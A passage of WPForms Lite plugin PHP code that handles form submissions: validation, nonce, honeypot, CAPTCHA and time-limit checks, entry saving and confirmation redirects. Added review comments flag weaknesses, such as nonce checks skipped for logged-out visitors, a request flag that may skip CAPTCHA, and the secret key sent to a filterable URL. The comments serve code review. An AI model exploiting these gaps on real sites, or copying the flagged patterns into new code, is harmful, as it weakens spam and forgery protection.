wpforms_log(
/* translators: %s - error unique ID. */
sprintf( esc_html__( 'Missing form data on form submission process %s', 'wpforms-lite' ), $error_id ),
esc_html__( 'Form data is not an array in `\WPForms_Process::process()`. It might be caused by incorrect data returned by `wpforms_process_before_form_data` filter. Verify whether you have a custom code using this filter and debug value it is returning.', 'wpforms-lite' ),
[
'type' => [ 'error', 'entry' ],
'form_id' => $form_id,
]
);
$error_messages[] = esc_html__( 'Your form has not been submitted because data is missing from the entry.', 'wpforms-lite' );
// The logs link and the error ID are added only when logging is on and the current user has the manage-options capability.
if ( wpforms_setting( 'logs-enable' ) && wpforms_current_user_can( wpforms_get_capability_manage_options() ) ) {
$error_messages[] = sprintf(
wp_kses( /* translators: %s - URL to the WPForms Logs admin page. */
__( 'Check the WPForms » Tools » <a href="%s">Logs</a> for more details.', 'wpforms-lite' ),
[ 'a' => [ 'href' => [] ] ]
),
esc_url(
add_query_arg(
[
'page' => 'wpforms-tool',
'view' => 'logs',
],
admin_url( 'admin.php' )
)
)
);
/* translators: %s - error unique ID. */
$error_messages[] = sprintf( esc_html__( 'Error ID: %s.', 'wpforms-lite' ), $error_id );
}
$errors[ $form_id ]['header'] = implode( '<br>', $error_messages );
$this->errors = $errors;
return;
}
/**
* Filter form entry before processing.
* Data is not validated or cleaned yet so use with caution.
*
* @since 1.4.0
*
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
*/
$entry = apply_filters( 'wpforms_process_before_filter', $entry, $this->form_data );
/**
* Pre-process hook.
*
* @since 1.4.0
*
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
*/
do_action( 'wpforms_process_before', $entry, $this->form_data );
/**
* Pre-process hook by form ID.
*
* @since 1.4.0
*
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
*/
do_action( "wpforms_process_before_{$form_id}", $entry, $this->form_data );
// NOTE(review): the `before` hooks above and the validate hooks below fire ahead of the
// nonce, honeypot and token checks further down, so their callbacks always see unverified input.
// Validate fields.
foreach ( $this->form_data['fields'] as $field_properties ) {
$field_id = $field_properties['id'];
$field_type = $field_properties['type'];
$field_submit = isset( $entry['fields'][ $field_id ] ) ? $entry['fields'][ $field_id ] : '';
/**
* Field type validation hook.
*
* @since 1.4.0
*
* @param int $field_id Field ID.
* @param mixed $field_submit Field submitted value.
* @param array $form_data Form data.
*/
do_action( "wpforms_process_validate_{$field_type}", $field_id, $field_submit, $this->form_data );
}
// Check if combined upload size exceeds allowed maximum.
$this->validate_combined_upload_size( $form );
/**
* Filter initial errors.
* Don't proceed if there are any errors thus far. We provide a filter
* so that other features, such as conditional logic, have the ability
* to adjust blocking errors.
*
* @since 1.4.0
*
* @param array $errors List of errors.
* @param array $form_data Form data.
*/
$errors = apply_filters( 'wpforms_process_initial_errors', $this->errors, $this->form_data );
// AMP verification request: reply with the per-input errors as JSON and never save anything.
if ( isset( $_POST['__amp_form_verify'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing
if ( empty( $errors[ $form_id ] ) ) {
wp_send_json( [], 200 );
} else {
$verify_errors = [];
// NOTE(review): $name is assigned only inside the conditional branches below. When none of
// them matches, it is either undefined or still holds the value from an earlier iteration.
foreach ( $errors[ $form_id ] as $field_id => $error_fields ) {
$field = $this->form_data['fields'][ $field_id ];
$field_properties = wpforms()->get( 'frontend' )->get_field_properties( $field, $this->form_data );
if ( is_string( $error_fields ) ) {
if ( $field['type'] === 'checkbox' || $field['type'] === 'radio' || $field['type'] === 'select' ) {
$first = current( $field_properties['inputs'] );
$name = $first['attr']['name'];
} elseif ( isset( $field_properties['inputs']['primary']['attr']['name'] ) ) {
$name = $field_properties['inputs']['primary']['attr']['name'];
}
$verify_errors[] = [
'name' => $name,
'message' => $error_fields,
];
} else {
foreach ( $error_fields as $error_field => $error_message ) {
if ( isset( $field_properties['inputs'][ $error_field ]['attr']['name'] ) ) {
$name = $field_properties['inputs'][ $error_field ]['attr']['name'];
}
$verify_errors[] = [
'name' => $name,
'message' => $error_message,
];
}
}
}
wp_send_json(
[
'verifyErrors' => $verify_errors,
],
400
);
}
return;
}
if ( ! empty( $errors[ $form_id ] ) ) {
if ( empty( $errors[ $form_id ]['header'] ) && empty( $errors[ $form_id ]['footer'] ) ) {
$errors[ $form_id ]['header'] = esc_html__( 'Form has not been submitted, please see the errors below.', 'wpforms-lite' );
}
$this->errors = $errors;
return;
}
// If a logged-in user fails the nonce check, we want to log the entry, disable the errors and fail silently.
// Please note that logs may be disabled and in this case nothing will be logged or reported.
// NOTE(review): the nonce is enforced only when is_user_logged_in() is true; a submission from
// a logged-out visitor passes this block without any nonce being looked at.
if (
is_user_logged_in() &&
( empty( $entry['nonce'] ) || ! wp_verify_nonce( $entry['nonce'], "wpforms::form_{$form_id}" ) )
) {
// Logs XSS attempt depending on log levels set.
// NOTE(review): a missing or invalid nonce points to a forged or stale request rather than
// cross-site scripting, so the log title below is a misnomer. The whole raw $entry is written
// to the log, so the log can hold whatever the visitor typed into the form.
wpforms_log(
'Cross-site scripting attempt ' . uniqid( '', true ),
[ true, $entry ],
[
'type' => [ 'security' ],
'form_id' => $this->form_data['id'],
]
);
// Fail silently.
return;
}
$honeypot = wpforms()->get( 'honeypot' )->validate( $this->form_data, $this->fields, $entry );
// If we trigger the honey pot, we want to log the entry, disable the errors, and fail silently.
if ( $honeypot ) {
$this->log_spam_entry( $entry, $honeypot );
// Fail silently.
return;
}
$token = wpforms()->get( 'token' )->validate( $this->form_data, $this->fields, $entry );
// If spam - return early.
// For antispam, we want to make sure that we have a value, we are not using AMP, and the value is an error string.
if ( $token && ! wpforms_is_amp() && is_string( $token ) ) {
$this->errors[ $this->form_data['id'] ]['header'] = $token;
$this->log_spam_entry( $entry, $token );
return;
}
// Pass the form created date into the form data.
$this->form_data['created'] = $form->post_date;
// Format fields.
foreach ( (array) $this->form_data['fields'] as $field_properties ) {
$field_id = $field_properties['id'];
$field_type = $field_properties['type'];
$field_submit = isset( $entry['fields'][ $field_id ] ) ? $entry['fields'][ $field_id ] : '';
/**
* Format field by type.
*
* @since 1.4.0
*
* @param string $field_id Field ID.
* @param string $field_submit Submitted field value.
* @param array $form_data Form data and settings.
*/
do_action( "wpforms_process_format_{$field_type}", $field_id, $field_submit, $this->form_data );
}
/**
* Format form data after all fields have been processed.
* This hook is for internal purposes and should not be leveraged.
*
* @since 1.4.0
*
* @param array $form_data Form data and settings.
*/
do_action( 'wpforms_process_format_after', $this->form_data );
/**
* Filter fields before processing.
* Process hooks/filter - this is where most addons should hook
* because at this point we have completed all field validation and
* formatted the data.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
$this->fields = apply_filters( 'wpforms_process_filter', $this->fields, $entry, $this->form_data );
/**
* Process form fields.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
do_action( 'wpforms_process', $this->fields, $entry, $this->form_data );
/**
* Process form fields by form ID.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
do_action( "wpforms_process_{$form_id}", $this->fields, $entry, $this->form_data );
/**
* Filter fields after processing.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
$this->fields = apply_filters( 'wpforms_process_after_filter', $this->fields, $entry, $this->form_data );
// Both spam-related checks are skipped together when is_bypass_spam_check() returns true.
if ( ! $this->is_bypass_spam_check( $entry ) ) {
// Check if the form was submitted too quickly.
$this->time_limit_check();
// Check for spam.
$this->process_spam_check( $entry );
}
$store_spam_entries = ! empty( $this->form_data['settings']['store_spam_entries'] ) && $this->form_data['settings']['store_spam_entries'];
// Mark submission as spam if one of the spam checks failed and spam entries are stored.
$marked_as_spam = $this->spam_reason && $store_spam_entries;
// Store spam reason.
if ( $this->spam_reason ) {
$this->form_data['spam_reason'] = $this->spam_reason;
}
// Convert spam errors to form errors if spam entries are not stored.
if ( ! $store_spam_entries && ! empty( $this->spam_errors ) ) {
$this->errors = $this->spam_errors;
}
// One last error check - don't proceed if there are any errors.
if ( ! empty( $this->errors[ $form_id ] ) ) {
if ( empty( $this->errors[ $form_id ]['header'] ) && empty( $this->errors[ $form_id ]['footer'] ) ) {
$this->errors[ $form_id ]['header'] = esc_html__( 'Form has not been submitted, please see the errors below.', 'wpforms-lite' );
}
return;
}
// Set raw post data.
// page_url is supplied by the client; it is unslashed and passed through esc_url_raw() before being kept.
$this->form_data['post_data_raw'] = [
'page_url' => isset( $_POST['page_url'] ) ? esc_url_raw( wp_unslash( $_POST['page_url'] ) ) : '',
];
// Success - add entry to database.
$this->entry_id = $this->entry_save( $this->fields, $entry, $this->form_data['id'], $this->form_data );
// Add payment to database.
$payment_id = $this->payment_save( $entry );
/**
* Runs right after adding entry to the database.
*
* @since 1.7.7
* @since 1.8.2 Added Payment ID param.
*
* @param array $fields Fields data.
* @param array $entry User submitted data.
* @param array $form_data Form data.
* @param int $entry_id Entry ID.
* @param int $payment_id Payment ID.
*/
do_action( 'wpforms_process_entry_saved', $this->fields, $entry, $this->form_data, $this->entry_id, $payment_id );
// Fire the logic to send notification emails.
$this->entry_email( $this->fields, $entry, $this->form_data, $this->entry_id, 'entry' );
// The two assignments below write into the $_POST superglobal, so code running later in the
// same request sees the formatted fields and the entry ID there.
// Pass completed and formatted fields in POST.
$_POST['wpforms']['complete'] = $this->fields;
// Pass entry ID in POST.
$_POST['wpforms']['entry_id'] = $this->entry_id;
// Logs entry depending on log levels set.
if ( wpforms()->is_pro() ) {
wpforms_log(
$this->entry_id ? "Entry {$this->entry_id}" : 'Entry',
$this->fields,
[
'type' => [ 'entry' ],
'parent' => $this->entry_id,
'form_id' => $this->form_data['id'],
]
);
}
// Does not proceed if a form is marked as spam.
if ( ! $marked_as_spam ) {
$this->process_complete( $form_id, $this->form_data, $this->fields, $entry, $this->entry_id );
}
$this->entry_confirmation_redirect( $this->form_data );
}
/**
* Log spam entry.
*
* @since 1.8.3
*
* @param array $entry Form submission raw data ($_POST).
* @param string $message Spam message.
*/
private function log_spam_entry( $entry, $message ) {
	// A unique suffix keeps individual spam hits apart in the log list.
	$title = 'Spam Entry ' . uniqid( '', true );

	// The raw submission is logged next to the reason, so the log holds visitor-supplied content.
	$details = [ $message, $entry ];

	$meta = [
		'type'    => [ 'spam' ],
		'form_id' => $this->form_data['id'],
	];

	wpforms_log( $title, $details, $meta );
}
/**
* Check if the form was submitted too quickly.
*
* @since 1.8.3
*/
private function time_limit_check() { // phpcs:ignore Generic.Metrics.CyclomaticComplexity.TooHigh
	/**
	 * Lets integrations switch the minimum-time check off for a submission.
	 *
	 * @since 1.8.3
	 *
	 * @param bool  $bypass    Whether to bypass the time limit check, default false.
	 * @param array $form_data Form data.
	 *
	 * @return bool
	 */
	$bypass = apply_filters( 'wpforms_process_time_limit_check_bypass', false, $this->form_data );

	if ( $bypass ) {
		return;
	}

	$settings = $this->form_data['settings'];
	$config   = [];

	if ( ! empty( $settings['anti_spam']['time_limit'] ) ) {
		$config = $settings['anti_spam']['time_limit'];
	}

	$seconds = empty( $config['duration'] ) ? 0 : absint( $config['duration'] );

	// The check applies only when it is switched on and has a positive duration.
	if ( empty( $config['enable'] ) || $seconds <= 0 ) {
		return;
	}

	// The setting is in seconds; the submitted timestamps are compared in milliseconds.
	$min_elapsed_ms = $seconds * 1000;

	// Both timestamps are read from the request body, i.e. they are supplied by the client.
	//phpcs:disable WordPress.Security.NonceVerification.Missing
	$start = empty( $_POST['start_timestamp'] ) ? 0 : absint( $_POST['start_timestamp'] );
	$end   = empty( $_POST['end_timestamp'] ) ? 0 : absint( $_POST['end_timestamp'] );
	//phpcs:enable WordPress.Security.NonceVerification.Missing

	// Keep only the fields that carry a value.
	$filled = array_filter(
		$this->fields,
		static function ( $field ) {
			return ! empty( $field['value'] );
		}
	);

	$has_start = $start !== 0;

	// No start time but values present: treated as a prefilled form and let through.
	if ( ! $has_start && count( $filled ) > 0 ) {
		return;
	}

	// Too quick, or no start time at all: block the submission with a header error.
	if ( ! $has_start || ( $end - $start ) < $min_elapsed_ms ) {
		$this->errors[ $this->form_data['id'] ]['header'] = esc_html__( 'Please wait a little longer before submitting. We’re running a quick security check.', 'wpforms-lite' );
	}
}
/**
* Process complete.
*
* @since 1.8.3
*
* @param int $form_id Form ID.
* @param array $form_data Form data and settings.
* @param array $fields Fields data.
* @param array $entry Form submission raw data ($_POST).
* @param int $entry_id Entry ID.
*/
public function process_complete( $form_id, $form_data, $fields, $entry, $entry_id ) {
	// The generic hook and the per-form hook receive the same arguments in the same order.
	$hook_args = [ $fields, $entry, $form_data, $entry_id ];

	/**
	 * Runs right after the form has been successfully submitted.
	 *
	 * @since 1.0.0
	 * @since 1.8.3 Added $entry parameter.
	 *
	 * @param array $fields    Fields data.
	 * @param array $entry     Form submission raw data ($_POST).
	 * @param array $form_data Form data.
	 * @param int   $entry_id  Entry ID.
	 */
	do_action( 'wpforms_process_complete', ...$hook_args );

	/**
	 * Runs right after the form has been successfully submitted by form ID.
	 *
	 * @since 1.0.0
	 * @since 1.8.3 Added $entry parameter.
	 *
	 * @param array $fields    Fields data.
	 * @param array $entry     Form submission raw data ($_POST).
	 * @param array $form_data Form data.
	 * @param int   $entry_id  Entry ID.
	 */
	do_action( "wpforms_process_complete_{$form_id}", ...$hook_args );
}
/**
* Check for spam.
*
* @since 1.8.3
*
* @param array $entry Form submission raw data ($_POST).
*/
public function process_spam_check( $entry ) {
	// CAPTCHA runs first; once it has recorded a spam reason, Akismet is not consulted.
	$this->process_captcha( $entry );

	if ( $this->spam_reason ) {
		return;
	}

	$akismet_verdict = wpforms()->get( 'akismet' )->validate( $this->form_data, $entry );

	if ( ! $akismet_verdict ) {
		return;
	}

	// Akismet flagged the entry: record it under spam errors (not regular errors),
	// log it, and remember which check caught it.
	$this->spam_errors[ $this->form_data['id'] ]['header'] = $akismet_verdict;

	$this->log_spam_entry( $entry, $akismet_verdict );

	$this->spam_reason = esc_html__( 'Akismet', 'wpforms-lite' );
}
/**
* Is bypass spam check.
*
* @since 1.8.3
*
* @param array $entry Form submission raw data ($_POST).
*
* @return bool
*/
protected function is_bypass_spam_check( $entry ) {
	/**
	 * Filter to bypass CAPTCHA check.
	 *
	 * @since 1.6.6
	 *
	 * @param bool  $bypass_captcha Whether to bypass CAPTCHA check.
	 * @param array $entry          Form submission raw data ($_POST).
	 * @param array $form_data      Form data.
	 */
	$bypass = apply_filters( 'wpforms_process_bypass_captcha', false, $entry, $this->form_data );

	// Returned exactly as the filter produced it (no bool cast); the default is false,
	// so the check is only skipped when a hooked callback says so.
	return $bypass;
}
/**
* Process captcha.
*
* @since 1.8.0
* @since 1.8.3 Removed $captcha_settings parameter.
*
* @param array $entry Form submission raw data ($_POST).
*
* @return void
*/
private function process_captcha( $entry ) { // phpcs:ignore Generic.Metrics.CyclomaticComplexity.TooHigh,Generic.Metrics.CyclomaticComplexity.MaxExceeded
	// Sends the submitted CAPTCHA token to the configured provider for verification.
	// Nothing is returned: a missing token is recorded in $this->errors, a failed
	// verification in $this->spam_errors and $this->spam_reason.

	$captcha_settings = wpforms_get_captcha_settings();

	if ( ! $this->allow_process_captcha( $entry, $captcha_settings ) ) {
		return;
	}

	$provider        = $captcha_settings['provider'];
	$current_captcha = $this->get_captcha( $provider );

	// Unknown provider: no verification is performed and the submission continues.
	if ( empty( $current_captcha ) ) {
		return;
	}

	$verify_url_raw   = $current_captcha['verify_url_raw'];
	$captcha_provider = $current_captcha['provider'];
	$post_key         = $current_captcha['post_key'];

	/* translators: %s - The CAPTCHA provider name. */
	$error = wpforms_setting( "{$provider}-fail-msg", sprintf( esc_html__( '%s verification failed, please try again later.', 'wpforms-lite' ), $captcha_provider ) );

	// The token is taken from the request as-is and only forwarded to the provider.
	// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.NonceVerification.Missing
	$token           = ! empty( $_POST[ $post_key ] ) ? $_POST[ $post_key ] : false;
	$is_recaptcha_v3 = $provider === 'recaptcha' && $captcha_settings['recaptcha_type'] === 'v3';

	// reCAPTCHA v3 delivers its token under a different request key.
	if ( $is_recaptcha_v3 ) {
		// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.NonceVerification.Missing
		$token = ! empty( $_POST['wpforms']['recaptcha'] ) ? $_POST['wpforms']['recaptcha'] : false;
	}

	// Request body for the verification call; note that it carries the secret key.
	$verify_query_arg = [
		'secret'   => $captcha_settings['secret_key'],
		'response' => $token,
		'remoteip' => wpforms_get_ip(),
	];

	// No token at all: report a regular form error (not a spam error) and stop.
	if ( ! $token ) {
		$this->errors[ $this->form_data['id'] ]['recaptcha'] = $error;

		return;
	}

	/*
	 * hCaptcha uses user IP to better detect bots and their attacks on a form.
	 * Majority of our users have GDPR disabled.
	 * So we remove this data from the request only when it's not needed, depending on wpforms_is_collecting_ip_allowed($this->form_data) check.
	 */
	if ( ! wpforms_is_collecting_ip_allowed( $this->form_data ) ) {
		unset( $verify_query_arg['remoteip'] );
	}

	/**
	 * Change query arguments for remote call to the captcha API.
	 *
	 * @since 1.8.0
	 *
	 * @param array $verify_query_arg The query arguments for verify URL.
	 * @param array $form_data        Form data and settings.
	 */
	$verify_query_arg = apply_filters( 'wpforms_process_captcha_verify_query_arg', $verify_query_arg, $this->form_data );

	// NOTE(review): the URL returned by this filter receives the request body above,
	// secret key included - confirm that only trusted code is hooked here.
	/**
	 * Filter the CAPTCHA verify URL.
	 *
	 * @since 1.6.4
	 * @since 1.8.0 Added $form_data argument.
	 *
	 * @param string $verify_url       The full CAPTCHA verify URL.
	 * @param string $verify_url_raw   The CAPTCHA verify URL without query.
	 * @param array  $verify_query_arg The query arguments for verify URL.
	 * @param array  $form_data        Form data and settings.
	 */
	$verify_url = apply_filters( 'wpforms_process_captcha_verify_url', $verify_url_raw, $verify_url_raw, $verify_query_arg, $this->form_data );

	// The HTTP result is not inspected for transport errors here. A body that does not
	// decode to an object with a truthy `success` falls into the failure branch below,
	// so an unreachable provider is handled like a failed verification.
	$response      = wp_remote_post( $verify_url, [ 'body' => $verify_query_arg ] );
	$response_body = json_decode( wp_remote_retrieve_body( $response ), false );

	// Failure: the provider did not confirm the token, or (v3 only) the score is at or
	// below the configured threshold (default '0.4').
	// NOTE(review): `score` is read here without the isset() guard used a few lines down.
	if (
		empty( $response_body->success ) ||
		( $is_recaptcha_v3 && $response_body->score <= wpforms_setting( 'recaptcha-v3-threshold', '0.4' ) )
	) {
		// Append the v3 score to the message when the provider returned one.
		if ( $is_recaptcha_v3 && isset( $response_body->score ) ) {
			$error .= ' (' . esc_html( $response_body->score ) . ')';
		}

		$this->spam_errors[ $this->form_data['id'] ]['recaptcha'] = $error;

		$this->log_spam_entry( $entry, $error );

		$this->spam_reason = $captcha_provider;
	}
}
/**
* Check if CAPTCHA processing is allowed.
*
* @since 1.8.3
*
* @param array $entry Form entry data.
* @param array $captcha_settings CAPTCHA settings.
*
* @return bool
*/
private function allow_process_captcha( $entry, $captcha_settings ) { // phpcs:ignore Generic.Metrics.CyclomaticComplexity.TooHigh
	// AMP verify requests never go through CAPTCHA processing.
	// NOTE(review): this flag is read straight from the request body - confirm a plain
	// (non-AMP) submission cannot use it to skip the CAPTCHA.
	if ( isset( $_POST['__amp_form_verify'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing
		return false;
	}

	// No provider configured.
	if ( empty( $captcha_settings['provider'] ) ) {
		return false;
	}

	$provider = $captcha_settings['provider'];

	// Provider explicitly switched off.
	if ( $provider === 'none' ) {
		return false;
	}

	// Both keys are needed to talk to the provider.
	$has_keys = ! empty( $captcha_settings['site_key'] ) && ! empty( $captcha_settings['secret_key'] );

	if ( ! $has_keys ) {
		return false;
	}

	// The per-form switch is stored under `recaptcha` whichever provider is configured.
	$form_settings = $this->form_data['settings'] ?? [];

	if ( ! isset( $form_settings['recaptcha'] ) || (int) $form_settings['recaptcha'] !== 1 ) {
		return false;
	}

	$recaptcha_type = $captcha_settings['recaptcha_type'];
	$uses_v3        = $provider === 'recaptcha' && $recaptcha_type === 'v3';

	// On AMP only Google reCAPTCHA v3 is supported; anything else is skipped there.
	return $uses_v3 || ! wpforms_is_amp();
}
/**
* Get all available CAPTCHA providers.
*
* @since 1.8.3
*
* @return array
*/
private function get_captcha_providers() {
	// Built-in providers, keyed by the provider slug used in the CAPTCHA settings.
	// `verify_url_raw` is the endpoint the token is verified against, `provider` the
	// display name, `post_key` the request field the token arrives in.
	$providers = [
		'hcaptcha'  => [
			'verify_url_raw' => 'https://hcaptcha.com/siteverify',
			'provider'       => 'hCaptcha',
			'post_key'       => 'h-captcha-response',
		],
		'recaptcha' => [
			'verify_url_raw' => 'https://www.google.com/recaptcha/api/siteverify',
			'provider'       => 'Google reCAPTCHA',
			'post_key'       => 'g-recaptcha-response',
		],
		'turnstile' => [
			'verify_url_raw' => 'https://challenges.cloudflare.com/turnstile/v0/siteverify',
			'provider'       => 'Cloudflare Turnstile',
			'post_key'       => 'cf-turnstile-response', // The key is specified by the API.
		],
	];

	// NOTE(review): process_captcha() posts the secret key to `verify_url_raw`, so any
	// callback that adds or changes entries here also chooses where that key is sent.
	/**
	 * Filter the CAPTCHA providers.
	 *
	 * @since 1.8.3
	 *
	 * @param array $providers The CAPTCHA providers.
	 */
	return apply_filters( 'wpforms_process_captcha_providers', $providers );
}
/**
* Get CAPTCHA provider data.
*
* @since 1.8.3
*
* @param string $provider CAPTCHA provider.
*
* @return array
*/
private function get_captcha( $provider ) {
	$available = $this->get_captcha_providers();

	// An unknown slug yields an empty array, which callers treat as "no provider".
	return isset( $available[ $provider ] ) ? $available[ $provider ] : [];
}
/**
* Check if combined upload size exceeds allowed maximum.
*
* @since 1.6.0
*
* @param \WP_Post $form Form post object.
*/
public function validate_combined_upload_size( $form ) {
	$form_id       = (int) $form->ID;
	$upload_fields = wpforms_get_form_fields( $form, [ 'file-upload' ] );

	// Nothing to measure without upload fields or uploaded files.
	if ( empty( $upload_fields ) || empty( $_FILES ) ) {
		return;
	}

	// Only look at $_FILES entries named the way WPForms names them: wpforms_{form}_{field}.
	$key_prefix   = 'wpforms_' . $form_id . '_';
	$expected_key = preg_filter( '/^/', $key_prefix, array_keys( $upload_fields ) );

	// Uploads that already failed are ignored here; WPForms_Field_File_Upload reports those individually.
	$clean_uploads = wp_list_filter( wp_array_slice_assoc( $_FILES, $expected_key ), [ 'error' => 0 ] );
	$combined_size = array_sum( wp_list_pluck( $clean_uploads, 'size' ) );
	$allowed_size  = wpforms_max_upload( true );

	if ( ! ( $combined_size > $allowed_size ) ) {
		return;
	}

	// Append to any header error that is already set instead of replacing it.
	$previous = ! empty( $this->errors[ $form_id ]['header'] ) ? $this->errors[ $form_id ]['header'] . '<br>' : '';

	$this->errors[ $form_id ]['header'] = $previous . esc_html__( 'Uploaded files combined size exceeds allowed maximum.', 'wpforms-lite' );
}
/**
* Validate the form return hash.
*
* @since 1.0.0
*
* @param string $hash Base64-encoded hash of form and entry IDs.
*
* @return array|false Form ID, entry ID and entry fields, or false when the hash or its entry is invalid.
*/
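public function validate_return_hash( $hash = '' ) {
	// The value comes from the request, so every decoded part is treated as untrusted.
	if ( ! is_string( $hash ) || $hash === '' ) {
		return false;
	}

	$output = [];

	parse_str( (string) base64_decode( $hash ), $output );

	// All three parts must be present as plain strings. parse_str() turns `key[]=x`
	// into an array, which must not reach the concatenation or comparison below.
	foreach ( [ 'form_id', 'entry_id', 'hash' ] as $required ) {
		if ( ! isset( $output[ $required ] ) || ! is_string( $output[ $required ] ) ) {
			return false;
		}
	}

	// Verify hash matches. hash_equals() compares in constant time, so response timing
	// does not reveal how much of a guessed hash was correct.
	$expected = wp_hash( $output['form_id'] . ',' . $output['entry_id'] );

	if ( ! hash_equals( (string) $expected, $output['hash'] ) ) {
		return false;
	}

	// Get lead and verify it is attached to the form we received with it.
	$entry = wpforms()->get( 'entry' )->get( $output['entry_id'], [ 'cap' => false ] );

	if ( empty( $entry->form_id ) ) {
		return false;
	}

	// Strict comparison against the parsed string value, as before.
	// NOTE(review): this relies on $entry->form_id being a string - confirm.
	if ( $output['form_id'] !== $entry->form_id ) {
		return false;
	}

	return [
		'form_id'  => absint( $output['form_id'] ),
		// Previously this returned the form ID under `entry_id`.
		'entry_id' => absint( $output['entry_id'] ),
		'fields'   => isset( $entry->fields ) ? $entry->fields : [],
	];
}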
/**
* Check if the confirmation data are valid.
*
* @since 1.6.4
*
* @param array $data The confirmation data.
*
* @return bool
*/
protected function is_valid_confirmation( $data ) {
	// A confirmation without a type cannot be processed.
	if ( empty( $data['type'] ) ) {
		return false;
	}

	// The type (redirect, page or message) doubles as the key that holds its content.
	$content_key = $data['type'];

	if ( ! isset( $data[ $content_key ] ) ) {
		return false;
	}

	return ! wpforms_is_empty_string( $data[ $content_key ] );
}
/**
* Redirect user to a page or URL specified in the form confirmation settings.
*
* @since 1.0.0
*
* @param array $form_data Form data and settings.
* @param string $hash Base64-encoded hash of form and entry IDs.
*/
public function entry_confirmation_redirect( $form_data = [], $hash = '' ) {
	// Picks the confirmation that applies to this submission and either redirects
	// (ending the request) or stores the confirmation message for the frontend.

	// Maybe process return hash.
	if ( ! empty( $hash ) ) {

		$hash_data = $this->validate_return_hash( $hash );

		// An invalid hash ends processing silently: no redirect and no message.
		if ( ! $hash_data || ! is_array( $hash_data ) ) {
			return;
		}

		// From here on the entry, its fields and the form are those named by the validated hash.
		$this->valid_hash = true;
		$this->entry_id   = absint( $hash_data['entry_id'] );
		// NOTE(review): validate_return_hash() returns an array for `fields` when the entry
		// has none, while json_decode() expects a string - confirm that case cannot occur.
		$this->fields     = json_decode( $hash_data['fields'], true );
		$this->form_data  = wpforms()->get( 'form' )->get(
			absint( $hash_data['form_id'] ),
			[
				'content_only' => true,
			]
		);

	} else {

		$this->form_data = $form_data;
	}

	// Backward compatibility: build confirmation #1 from the older flat settings keys.
	if ( empty( $this->form_data['settings']['confirmations'] ) ) {
		$this->form_data['settings']['confirmations'][1]['type']           = ! empty( $this->form_data['settings']['confirmation_type'] ) ? $this->form_data['settings']['confirmation_type'] : 'message';
		$this->form_data['settings']['confirmations'][1]['message']        = ! empty( $this->form_data['settings']['confirmation_message'] ) ? $this->form_data['settings']['confirmation_message'] : esc_html__( 'Thanks for contacting us! We will be in touch with you shortly.', 'wpforms-lite' );
		$this->form_data['settings']['confirmations'][1]['message_scroll'] = ! empty( $this->form_data['settings']['confirmation_message_scroll'] ) ? $this->form_data['settings']['confirmation_message_scroll'] : 1;
		$this->form_data['settings']['confirmations'][1]['page']           = ! empty( $this->form_data['settings']['confirmation_page'] ) ? $this->form_data['settings']['confirmation_page'] : '';
		$this->form_data['settings']['confirmations'][1]['redirect']       = ! empty( $this->form_data['settings']['confirmation_redirect'] ) ? $this->form_data['settings']['confirmation_redirect'] : '';
	}

	if ( empty( $this->form_data['settings']['confirmations'] ) || ! is_array( $this->form_data['settings']['confirmations'] ) ) {
		return;
	}

	$confirmations = $this->form_data['settings']['confirmations'];

	// Reverse sort confirmations by id to process newer ones first.
	krsort( $confirmations );

	// The lowest id is the fallback confirmation.
	$default_confirmation_key = min( array_keys( $confirmations ) );

	// When the loop ends, $confirmation_id holds the confirmation to use: the first
	// valid one the filter accepts, otherwise the fallback.
	foreach ( $confirmations as $confirmation_id => $confirmation ) {
		// Last confirmation should execute in any case.
		if ( $default_confirmation_key === $confirmation_id ) {
			break;
		}

		if ( ! $this->is_valid_confirmation( $confirmation ) ) {
			continue;
		}

		// phpcs:disable WPForms.PHP.ValidateHooks.InvalidHookName
		/**
		 * Process confirmation filter.
		 *
		 * @since 1.4.8
		 *
		 * @param bool  $process   Whether to process the logic or not.
		 * @param array $fields    List of submitted fields.
		 * @param array $form_data Form data and settings.
		 * @param int   $id        Confirmation ID.
		 */
		$process_confirmation = apply_filters( 'wpforms_entry_confirmation_process', true, $this->fields, $this->form_data, $confirmation_id );
		// phpcs:enable WPForms.PHP.ValidateHooks.InvalidHookName

		if ( $process_confirmation ) {
			break;
		}
	}

	$url = '';

	// Redirect if needed, to either a page or URL, after form processing.
	if ( ! empty( $confirmations[ $confirmation_id ]['type'] ) && 'message' !== $confirmations[ $confirmation_id ]['type'] ) {

		if ( $confirmations[ $confirmation_id ]['type'] === 'redirect' ) {
			// While smart tags are expanded in the redirect URL, values passing through this
			// filter are rawurlencode()d, so submitted text ends up as encoded data in the URL
			// rather than as URL structure. Presumably the filter covers field-value smart
			// tags - confirm against the smart tag implementation.
			$rawurlencode_callback = static function ( $value ) {
				return $value === null ? null : rawurlencode( $value );
			};

			add_filter( 'wpforms_smarttags_process_field_id_value', $rawurlencode_callback );

			$url = wpforms_process_smart_tags( $confirmations[ $confirmation_id ]['redirect'], $this->form_data, $this->fields, $this->entry_id );

			// Remove the encoder again so smart tags used elsewhere are not affected.
			remove_filter( 'wpforms_smarttags_process_field_id_value', $rawurlencode_callback );
		}

		if ( 'page' === $confirmations[ $confirmation_id ]['type'] ) {
			$url = get_permalink( (int) $confirmations[ $confirmation_id ]['page'] );
		}
	}

	if ( ! empty( $url ) ) {
		// Hooked callbacks can replace the destination at this point.
		$url = apply_filters( 'wpforms_process_redirect_url', $url, $this->form_data['id'], $this->fields, $this->form_data, $this->entry_id );

		if ( wpforms_is_amp() ) {
			/** This filter is documented in wp-includes/pluggable.php */
